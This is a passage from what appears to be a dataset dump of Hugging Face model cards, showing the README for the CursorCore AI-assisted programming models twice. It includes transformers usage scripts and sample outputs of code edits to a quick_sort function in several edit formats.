<|next_start|>```python
def quick_sort(array):
if len(array) <= 1:
return array
pivot = array[len(array) // 2]
left = [x for x in array if x < pivot]
middle = [x for x in array if x == pivot]
right = [x for x in array if x > pivot]
return quick_sort(left) + middle + quick_sort(right)
```<|next_end|>
The user has provided a revised code change that corrects the parameter name from `arr` to `array` in the `quick_sort` function. This change ensures consistency in the function definition and avoids potential confusion or errors.
To implement this, we will:
1. Update the parameter name in the function definition from `arr` to `array`.
2. Ensure that all references to `arr` within the function are updated to `array`.
This will make the function definition and internal references consistent, improving code readability and maintainability.<|im_end|>
````
Script 2:
````python
import torch
from transformers import AutoTokenizer, AutoModelForCausalLM
from eval.utils import prepare_input_for_wf
tokenizer = AutoTokenizer.from_pretrained("TechxGenus/CursorCore-Yi-9B")
model = AutoModelForCausalLM.from_pretrained(
"TechxGenus/CursorCore-Yi-9B",
torch_dtype=torch.bfloat16,
device_map="auto"
)
sample = {
"history": [],
"current": {
"type": "code",
"lang": "python",
"code": """def quick_sort(array):\n if len(arr) <= 1:\n return arr\n pivot = arr[len(arr) // 2]\n left = [x for x in arr if x < pivot]\n middle = [x for x in arr if x == pivot]\n right = [x for x in arr if x > pivot]\n return quick_sort(left) + middle + quick_sort(right)"""
},
"user": "Add Docstring."
}
prompt = tokenizer.apply_chat_template(
prepare_input_for_wf(sample),
tokenize=False,
chat_template="assistant-conversation",
add_generation_prompt=True
)
inputs = tokenizer.encode(prompt, return_tensors="pt")
outputs = model.generate(input_ids=inputs.to(model.device), max_new_tokens=512, do_sample=False)
print(tokenizer.decode(outputs[0]))
````
Output 2:
````txt
<|im_start|>system
You are a helpful programming assistant.<|im_end|>
<|im_start|>current
```python
def quick_sort(array):
if len(arr) <= 1:
return arr
pivot = arr[len(arr) // 2]
left = [x for x in arr if x < pivot]
middle = [x for x in arr if x == pivot]
right = [x for x in arr if x > pivot]
return quick_sort(left) + middle + quick_sort(right)
```<|im_end|>
<|im_start|>user
Add Docstring.<|im_end|>
<|im_start|>assistant
<|next_start|>```python
def quick_sort(array):
"""
This is an implementation of the quick sort algorithm.
"""
if len(arr) <= 1:
return arr
pivot = arr[len(arr) // 2]
left = [x for x in arr if x < pivot]
middle = [x for x in arr if x == pivot]
right = [x for x in arr if x > pivot]
return quick_sort(left) + middle + quick_sort(right)
```<|next_end|><|im_end|>
````
For models in Locate-and-Change (LC) and Search-and-Replace (SR) formats, the output examples are as follows:
Script for LC:
````python
import torch
from transformers import AutoTokenizer, AutoModelForCausalLM
from eval.utils import prepare_input_for_lc
tokenizer = AutoTokenizer.from_pretrained("TechxGenus/CursorCore-Yi-1.5B-LC")
model = AutoModelForCausalLM.from_pretrained(
"TechxGenus/CursorCore-Yi-1.5B-LC",
torch_dtype=torch.bfloat16,
device_map="auto"
)
sample = {
"history": [],
"current": {
"type": "code",
"lang": "python",
"code": """def quick_sort(array):\n if len(arr) <= 1:\n return arr\n pivot = arr[len(arr) // 2]\n left = [x for x in arr if x < pivot]\n middle = [x for x in arr if x == pivot]\n right = [x for x in arr if x > pivot]\n return quick_sort(left) + middle + quick_sort(right)"""
},
"user": "Add Docstring."
}
prompt = tokenizer.apply_chat_template(
prepare_input_for_lc(sample),
tokenize=False,
chat_template="assistant-conversation",
add_generation_prompt=True
)
inputs = tokenizer.encode(prompt, return_tensors="pt")
outputs = model.generate(input_ids=inputs.to(model.device), max_new_tokens=512, do_sample=False)
print(tokenizer.decode(outputs[0]))
````
Output for LC:
````txt
<|im_start|>system
You are a helpful programming assistant.<|im_end|>
<|im_start|>current
```python
1 def quick_sort(array):
2 if len(arr) <= 1:
3 return arr
4 pivot = arr[len(arr) // 2]
5 left = [x for x in arr if x < pivot]
6 middle = [x for x in arr if x == pivot]
7 right = [x for x in arr if x > pivot]
8 return quick_sort(left) + middle + quick_sort(right)
```<|im_end|>
<|im_start|>user
Add Docstring.<|im_end|>
<|im_start|>assistant
<|next_start|>1,1
```
'''This function will sort an array using quick sort algorithm'''
```<|next_end|>
To enhance the readability and maintainability of the code, we should add a docstring to the `quick_sort` function. A docstring provides a clear description of what the function does, which is particularly useful for other developers who might use or modify this code in the future.
The docstring will be added immediately after the function definition, explaining that the function uses the quick sort algorithm to sort an array. This will make the code more self-explanatory and easier to understand.
Here's the plan:
1. Add a docstring at the beginning of the `quick_sort` function.
2. Ensure the docstring is clear and concise, describing the purpose of the function.
This modification will improve the code's documentation without altering its functionality.<|im_end|>
````
Script for SR:
````python
import torch
from transformers import AutoTokenizer, AutoModelForCausalLM
from eval.utils import prepare_input_for_sr
tokenizer = AutoTokenizer.from_pretrained("TechxGenus/CursorCore-Yi-1.5B-SR")
model = AutoModelForCausalLM.from_pretrained(
"TechxGenus/CursorCore-Yi-1.5B-SR",
torch_dtype=torch.bfloat16,
device_map="auto"
)
sample = {
"history": [],
"current": {
"type": "code",
"lang": "python",
"code": """def quick_sort(array):\n if len(arr) <= 1:\n return arr\n pivot = arr[len(arr) // 2]\n left = [x for x in arr if x < pivot]\n middle = [x for x in arr if x == pivot]\n right = [x for x in arr if x > pivot]\n return quick_sort(left) + middle + quick_sort(right)"""
},
"user": "Add Docstring."
}
prompt = tokenizer.apply_chat_template(
prepare_input_for_sr(sample),
tokenize=False,
chat_template="assistant-conversation",
add_generation_prompt=True
)
inputs = tokenizer.encode(prompt, return_tensors="pt")
outputs = model.generate(input_ids=inputs.to(model.device), max_new_tokens=512, do_sample=False)
print(tokenizer.decode(outputs[0]))
````
Output for SR:
````txt
<|im_start|>system
You are a helpful programming assistant.<|im_end|>
<|im_start|>current
```python
def quick_sort(array):
if len(arr) <= 1:
return arr
pivot = arr[len(arr) // 2]
left = [x for x in arr if x < pivot]
middle = [x for x in arr if x == pivot]
right = [x for x in arr if x > pivot]
return quick_sort(left) + middle + quick_sort(right)
```<|im_end|>
<|im_start|>user
Add Docstring.<|im_end|>
<|im_start|>assistant
<|next_start|>```python
def quick_sort(array):
<|search_and_replace|>
def quick_sort(array):
"""
This function implements quick sort algorithm
"""
```<|next_end|><|im_end|>
````
### 3) Web Demo
We create a web demo for CursorCore. Please visit [CursorWeb](https://github.com/TechxGenus/CursorWeb) for more details.
## Future Work
CursorCore is still in a very early stage, and lots of work is needed to achieve a better user experience. For example:
- Repository-level editing support
- Better and faster editing formats
- Better user interface and presentation
- ...
## Citation
```bibtex
@article{jiang2024cursorcore,
title = {CursorCore: Assist Programming through Aligning Anything},
author = {Hao Jiang and Qi Liu and Rui Li and Shengyu Ye and Shijin Wang},
year = {2024},
journal = {arXiv preprint arXiv: 2410.07002}
}
```
## Contribution
Contributions are welcome! If you find any bugs or have suggestions for improvements, please open an issue or submit a pull request.
|
TechxGenus/CursorCore-DS-1.3B-SR | TechxGenus | 2024-10-10T06:38:31Z | 130 | 0 | transformers | [
"transformers",
"safetensors",
"llama",
"text-generation",
"code",
"conversational",
"arxiv:2410.07002",
"base_model:deepseek-ai/deepseek-coder-1.3b-base",
"base_model:finetune:deepseek-ai/deepseek-coder-1.3b-base",
"license:other",
"autotrain_compatible",
"text-generation-inference",
"endpoints_compatible",
"region:us"
] | text-generation | 2024-10-08T04:12:12Z | ---
tags:
- code
base_model:
- deepseek-ai/deepseek-coder-1.3b-base
library_name: transformers
pipeline_tag: text-generation
license: other
license_name: deepseek
license_link: LICENSE
---
# CursorCore: Assist Programming through Aligning Anything
<p align="center">
<a href="http://arxiv.org/abs/2410.07002">[📄arXiv]</a> |
<a href="https://hf.co/papers/2410.07002">[🤗HF Paper]</a> |
<a href="https://huggingface.co/collections/TechxGenus/cursorcore-series-6706618c38598468866b60e2">[🤖Models]</a> |
<a href="https://github.com/TechxGenus/CursorCore">[🛠️Code]</a> |
<a href="https://github.com/TechxGenus/CursorWeb">[Web]</a> |
<a href="https://discord.gg/Z5Tev8fV">[Discord]</a>
</p>
<hr>
- [CursorCore: Assist Programming through Aligning Anything](#cursorcore-assist-programming-through-aligning-anything)
- [Introduction](#introduction)
- [Models](#models)
- [Usage](#usage)
- [1) Normal chat](#1-normal-chat)
- [2) Assistant-Conversation](#2-assistant-conversation)
- [3) Web Demo](#3-web-demo)
- [Future Work](#future-work)
- [Citation](#citation)
- [Contribution](#contribution)
<hr>
## Introduction
CursorCore is a series of open-source models designed for AI-assisted programming. It aims to support features such as automated editing and inline chat, replicating the core abilities of closed-source AI-assisted programming tools like Cursor. This is achieved by aligning data generated through Programming-Instruct. Please read [our paper](http://arxiv.org/abs/2410.07002) to learn more.
<p align="center">
<img width="100%" alt="conversation" src="https://raw.githubusercontent.com/TechxGenus/CursorCore/main/pictures/conversation.png">
</p>

## Models
Our models have been open-sourced on Hugging Face. You can access our models here: [CursorCore-Series](https://huggingface.co/collections/TechxGenus/cursorcore-series-6706618c38598468866b60e2"). We also provide pre-quantized weights for GPTQ and AWQ here: [CursorCore-Quantization](https://huggingface.co/collections/TechxGenus/cursorcore-quantization-67066431f29f252494ee8cf3)
## Usage
Here are some examples of how to use our model:
### 1) Normal chat
Script:
````python
import torch
from transformers import AutoTokenizer, AutoModelForCausalLM
tokenizer = AutoTokenizer.from_pretrained("TechxGenus/CursorCore-Yi-9B")
model = AutoModelForCausalLM.from_pretrained(
"TechxGenus/CursorCore-Yi-9B",
torch_dtype=torch.bfloat16,
device_map="auto"
)
messages = [
{"role": "user", "content": "Hi!"},
]
prompt = tokenizer.apply_chat_template(
messages,
tokenize=False,
add_generation_prompt=True
)
inputs = tokenizer.encode(prompt, return_tensors="pt")
outputs = model.generate(input_ids=inputs.to(model.device), max_new_tokens=512)
print(tokenizer.decode(outputs[0]))
````
Output:
````txt
<|im_start|>system
You are a helpful programming assistant.<|im_end|>
<|im_start|>user
Hi!<|im_end|>
<|im_start|>assistant
Hello! I'm an AI language model and I can help you with any programming questions you might have. What specific problem or task are you trying to solve?<|im_end|>
````
### 2) Assistant-Conversation
In our work, we introduce a new framework of AI-assisted programming task. It is designed for aligning anything during programming process, used for the implementation of features like Tab and Inline Chat.
Script 1:
````python
import torch
from transformers import AutoTokenizer, AutoModelForCausalLM
from eval.utils import prepare_input_for_wf
tokenizer = AutoTokenizer.from_pretrained("TechxGenus/CursorCore-Yi-9B")
model = AutoModelForCausalLM.from_pretrained(
"TechxGenus/CursorCore-Yi-9B",
torch_dtype=torch.bfloat16,
device_map="auto"
)
sample = {
"history": [
{
"type": "code",
"lang": "python",
"code": """def quick_sort(arr):\n if len(arr) <= 1:\n return arr\n pivot = arr[len(arr) // 2]\n left = [x for x in arr if x < pivot]\n middle = [x for x in arr if x == pivot]\n right = [x for x in arr if x > pivot]\n return quick_sort(left) + middle + quick_sort(right)"""
}
],
"current": {
"type": "code",
"lang": "python",
"code": """def quick_sort(array):\n if len(arr) <= 1:\n return arr\n pivot = arr[len(arr) // 2]\n left = [x for x in arr if x < pivot]\n middle = [x for x in arr if x == pivot]\n right = [x for x in arr if x > pivot]\n return quick_sort(left) + middle + quick_sort(right)"""
},
"user": ""
}
prompt = tokenizer.apply_chat_template(
prepare_input_for_wf(sample),
tokenize=False,
chat_template="assistant-conversation",
add_generation_prompt=True
)
inputs = tokenizer.encode(prompt, return_tensors="pt")
outputs = model.generate(input_ids=inputs.to(model.device), max_new_tokens=512, do_sample=False)
print(tokenizer.decode(outputs[0]))
````
Output 1:
````txt
<|im_start|>system
You are a helpful programming assistant.<|im_end|>
<|im_start|>history
```python
def quick_sort(arr):
if len(arr) <= 1:
return arr
pivot = arr[len(arr) // 2]
left = [x for x in arr if x < pivot]
middle = [x for x in arr if x == pivot]
right = [x for x in arr if x > pivot]
return quick_sort(left) + middle + quick_sort(right)
```<|im_end|>
<|im_start|>current
```python
def quick_sort(array):
if len(arr) <= 1:
return arr
pivot = arr[len(arr) // 2]
left = [x for x in arr if x < pivot]
middle = [x for x in arr if x == pivot]
right = [x for x in arr if x > pivot]
return quick_sort(left) + middle + quick_sort(right)
```<|im_end|>
<|im_start|>assistant
<|next_start|>```python
def quick_sort(array):
if len(array) <= 1:
return array
pivot = array[len(array) // 2]
left = [x for x in array if x < pivot]
middle = [x for x in array if x == pivot]
right = [x for x in array if x > pivot]
return quick_sort(left) + middle + quick_sort(right)
```<|next_end|>
The user has provided a revised code change that corrects the parameter name from `arr` to `array` in the `quick_sort` function. This change ensures consistency in the function definition and avoids potential confusion or errors.
To implement this, we will:
1. Update the parameter name in the function definition from `arr` to `array`.
2. Ensure that all references to `arr` within the function are updated to `array`.
This will make the function definition and internal references consistent, improving code readability and maintainability.<|im_end|>
````
Script 2:
````python
import torch
from transformers import AutoTokenizer, AutoModelForCausalLM
from eval.utils import prepare_input_for_wf
tokenizer = AutoTokenizer.from_pretrained("TechxGenus/CursorCore-Yi-9B")
model = AutoModelForCausalLM.from_pretrained(
"TechxGenus/CursorCore-Yi-9B",
torch_dtype=torch.bfloat16,
device_map="auto"
)
sample = {
"history": [],
"current": {
"type": "code",
"lang": "python",
"code": """def quick_sort(array):\n if len(arr) <= 1:\n return arr\n pivot = arr[len(arr) // 2]\n left = [x for x in arr if x < pivot]\n middle = [x for x in arr if x == pivot]\n right = [x for x in arr if x > pivot]\n return quick_sort(left) + middle + quick_sort(right)"""
},
"user": "Add Docstring."
}
prompt = tokenizer.apply_chat_template(
prepare_input_for_wf(sample),
tokenize=False,
chat_template="assistant-conversation",
add_generation_prompt=True
)
inputs = tokenizer.encode(prompt, return_tensors="pt")
outputs = model.generate(input_ids=inputs.to(model.device), max_new_tokens=512, do_sample=False)
print(tokenizer.decode(outputs[0]))
````
Output 2:
````txt
<|im_start|>system
You are a helpful programming assistant.<|im_end|>
<|im_start|>current
```python
def quick_sort(array):
if len(arr) <= 1:
return arr
pivot = arr[len(arr) // 2]
left = [x for x in arr if x < pivot]
middle = [x for x in arr if x == pivot]
right = [x for x in arr if x > pivot]
return quick_sort(left) + middle + quick_sort(right)
```<|im_end|>
<|im_start|>user
Add Docstring.<|im_end|>
<|im_start|>assistant
<|next_start|>```python
def quick_sort(array):
"""
This is an implementation of the quick sort algorithm.
"""
if len(arr) <= 1:
return arr
pivot = arr[len(arr) // 2]
left = [x for x in arr if x < pivot]
middle = [x for x in arr if x == pivot]
right = [x for x in arr if x > pivot]
return quick_sort(left) + middle + quick_sort(right)
```<|next_end|><|im_end|>
````
For models in Locate-and-Change (LC) and Search-and-Replace (SR) formats, the output examples are as follows:
Script for LC:
````python
import torch
from transformers import AutoTokenizer, AutoModelForCausalLM
from eval.utils import prepare_input_for_lc
tokenizer = AutoTokenizer.from_pretrained("TechxGenus/CursorCore-Yi-1.5B-LC")
model = AutoModelForCausalLM.from_pretrained(
"TechxGenus/CursorCore-Yi-1.5B-LC",
torch_dtype=torch.bfloat16,
device_map="auto"
)
sample = {
"history": [],
"current": {
"type": "code",
"lang": "python",
"code": """def quick_sort(array):\n if len(arr) <= 1:\n return arr\n pivot = arr[len(arr) // 2]\n left = [x for x in arr if x < pivot]\n middle = [x for x in arr if x == pivot]\n right = [x for x in arr if x > pivot]\n return quick_sort(left) + middle + quick_sort(right)"""
},
"user": "Add Docstring."
}
prompt = tokenizer.apply_chat_template(
prepare_input_for_lc(sample),
tokenize=False,
chat_template="assistant-conversation",
add_generation_prompt=True
)
inputs = tokenizer.encode(prompt, return_tensors="pt")
outputs = model.generate(input_ids=inputs.to(model.device), max_new_tokens=512, do_sample=False)
print(tokenizer.decode(outputs[0]))
````
Output for LC:
````txt
<|im_start|>system
You are a helpful programming assistant.<|im_end|>
<|im_start|>current
```python
1 def quick_sort(array):
2 if len(arr) <= 1:
3 return arr
4 pivot = arr[len(arr) // 2]
5 left = [x for x in arr if x < pivot]
6 middle = [x for x in arr if x == pivot]
7 right = [x for x in arr if x > pivot]
8 return quick_sort(left) + middle + quick_sort(right)
```<|im_end|>
<|im_start|>user
Add Docstring.<|im_end|>
<|im_start|>assistant
<|next_start|>1,1
```
'''This function will sort an array using quick sort algorithm'''
```<|next_end|>
To enhance the readability and maintainability of the code, we should add a docstring to the `quick_sort` function. A docstring provides a clear description of what the function does, which is particularly useful for other developers who might use or modify this code in the future.
The docstring will be added immediately after the function definition, explaining that the function uses the quick sort algorithm to sort an array. This will make the code more self-explanatory and easier to understand.
Here's the plan:
1. Add a docstring at the beginning of the `quick_sort` function.
2. Ensure the docstring is clear and concise, describing the purpose of the function.
This modification will improve the code's documentation without altering its functionality.<|im_end|>
````
Script for SR:
````python
import torch
from transformers import AutoTokenizer, AutoModelForCausalLM
from eval.utils import prepare_input_for_sr
tokenizer = AutoTokenizer.from_pretrained("TechxGenus/CursorCore-Yi-1.5B-SR")
model = AutoModelForCausalLM.from_pretrained(
"TechxGenus/CursorCore-Yi-1.5B-SR",
torch_dtype=torch.bfloat16,
device_map="auto"
)
sample = {
"history": [],
"current": {
"type": "code",
"lang": "python",
"code": """def quick_sort(array):\n if len(arr) <= 1:\n return arr\n pivot = arr[len(arr) // 2]\n left = [x for x in arr if x < pivot]\n middle = [x for x in arr if x == pivot]\n right = [x for x in arr if x > pivot]\n return quick_sort(left) + middle + quick_sort(right)"""
},
"user": "Add Docstring."
}
prompt = tokenizer.apply_chat_template(
prepare_input_for_sr(sample),
tokenize=False,
chat_template="assistant-conversation",
add_generation_prompt=True
)
inputs = tokenizer.encode(prompt, return_tensors="pt")
outputs = model.generate(input_ids=inputs.to(model.device), max_new_tokens=512, do_sample=False)
print(tokenizer.decode(outputs[0]))
````
Output for SR:
````txt
<|im_start|>system
You are a helpful programming assistant.<|im_end|>
<|im_start|>current
```python
def quick_sort(array):
if len(arr) <= 1:
return arr
pivot = arr[len(arr) // 2]
left = [x for x in arr if x < pivot]
middle = [x for x in arr if x == pivot]
right = [x for x in arr if x > pivot]
return quick_sort(left) + middle + quick_sort(right)
```<|im_end|>
<|im_start|>user
Add Docstring.<|im_end|>
<|im_start|>assistant
<|next_start|>```python
def quick_sort(array):
<|search_and_replace|>
def quick_sort(array):
"""
This function implements quick sort algorithm
"""
```<|next_end|><|im_end|>
````
### 3) Web Demo
We create a web demo for CursorCore. Please visit [CursorWeb](https://github.com/TechxGenus/CursorWeb) for more details.
## Future Work
CursorCore is still in a very early stage, and lots of work is needed to achieve a better user experience. For example:
- Repository-level editing support
- Better and faster editing formats
- Better user interface and presentation
- ...
## Citation
```bibtex
@article{jiang2024cursorcore,
title = {CursorCore: Assist Programming through Aligning Anything},
author = {Hao Jiang and Qi Liu and Rui Li and Shengyu Ye and Shijin Wang},
year = {2024},
journal = {arXiv preprint arXiv: 2410.07002}
}
```
## Contribution
Contributions are welcome! If you find any bugs or have suggestions for improvements, please open an issue or submit a pull request.
|
Subsets and Splits